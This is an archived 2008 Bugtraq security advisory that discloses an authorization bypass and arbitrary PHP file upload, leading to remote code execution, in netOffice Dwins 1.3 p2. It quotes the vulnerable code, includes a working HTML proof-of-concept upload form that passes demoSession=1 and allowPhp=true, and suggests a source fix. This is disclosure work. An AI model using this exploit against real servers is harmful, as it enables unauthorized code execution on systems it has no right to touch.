lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <51082.74.239.174.227.1204289777.squirrel@69.89.31.170>
Date: Fri, 29 Feb 2008 05:56:17 -0700 (MST)
From: db@...security.org
To: bugtraq@...urityfocus.com
Subject: netOffice Dwins 1.3 Remote code execution.

netOffice Dwins 1.3 Remote code execution.
--------------------------------------------------------

Product: netOffice Dwins
Version: 1.3 p2
Vendor:  http://netofficedwins.sourceforge.net/
Date:    02/29/08

- Introduction

"netOffice Dwins is a free web based time tracking, timesheet, and
project management environment."

- Details

It is possible for an attacker to bypass authorization, upload arbitrary
PHP files, and then execute them on the server.

netOffice extracts all GET, POST, SESSION, SERVER, and COOKIE parameters
into the local variable space.  This has the same effect as turning
on register globals.  The code below is from includes/library.php.

//GET array
    if (!empty($_GET)) {
        extract($_GET);
    } else if (!empty($HTTP_GET_VARS)) {
        extract($HTTP_GET_VARS);
    }

This lets an attacker set demoSession=1 to bypass authorization and
freely access any part of the application.  Setting the variable to one
bypasses the first check ($demoSession != true) but the second boolean
expression ($demoSession == 'true') evaluates to false thereby not
initializing the action variable to an empty string.

// check session validity, except for demo user
if (($checkSession == true) && ($demoSession != true)) {
    // a client user trying to get outside of the "client project site"
    if (($profilSession == 3) && (!strstr($_SERVER['PHP_SELF'],
'projects_site'))) {
        header('Location: ../index.php?session=false');
        exit;
    }

// disable actions if demo user logged in demo mode
if (!empty($action)) {
    if ($demoSession == 'true') {
	echo "true";
        $closeTopic = '';
        $addToSiteTask = '';
        $removeToSiteTask = '';
        $addToSiteTopic = '';
        $removeToSiteTopic = '';
        $addToSiteTeam = '';
        $removeToSiteTeam = '';
        $action = '';
        $msg = 'demo';
    }
}

Next an attacker could use access the uploadfile.php form without
logging in to upload and execute PHP files.  Normally php files are
not allowed unless the allowPhp variable is set to true.

- Proof of Concept

<form accept-charset="UNKNOWN" method="POST"
action="http://target/netoffice/projects_site/uploadfile.php?demoSession=1&allowPhp=true&action=add&amp;project=&amp;task=#filedetailsAnchor"
name="feeedback" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="100000000"><input
type="hidden" name="maxCustom" value="">
<table cellpadding="3" cellspacing="0" border="0">
<tr><th colspan="2">Upload Form</th></tr>
<tr><th>Comments :</th><td><textarea cols="60" name="commentsField"
rows="6"></textarea></td></tr>
<tr><th>Upload :</th><td><input size="35" value="" name="upload"
type="file"></td></tr>
<tr><th>&nbsp;</th><td><input name="submit" type="submit"
value="Save"><br><br></td></tr></table>
</form>

- Solution

Authors were notified on 2/19, no fix is currently available.  Edit
the source to prevent authorization bypass.

in includes/library.php change
	if ($demoSession == 'true') {
to
	if ($demoSession == true) {

Author: dB
Email: dB [at] rawsecurity.org



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ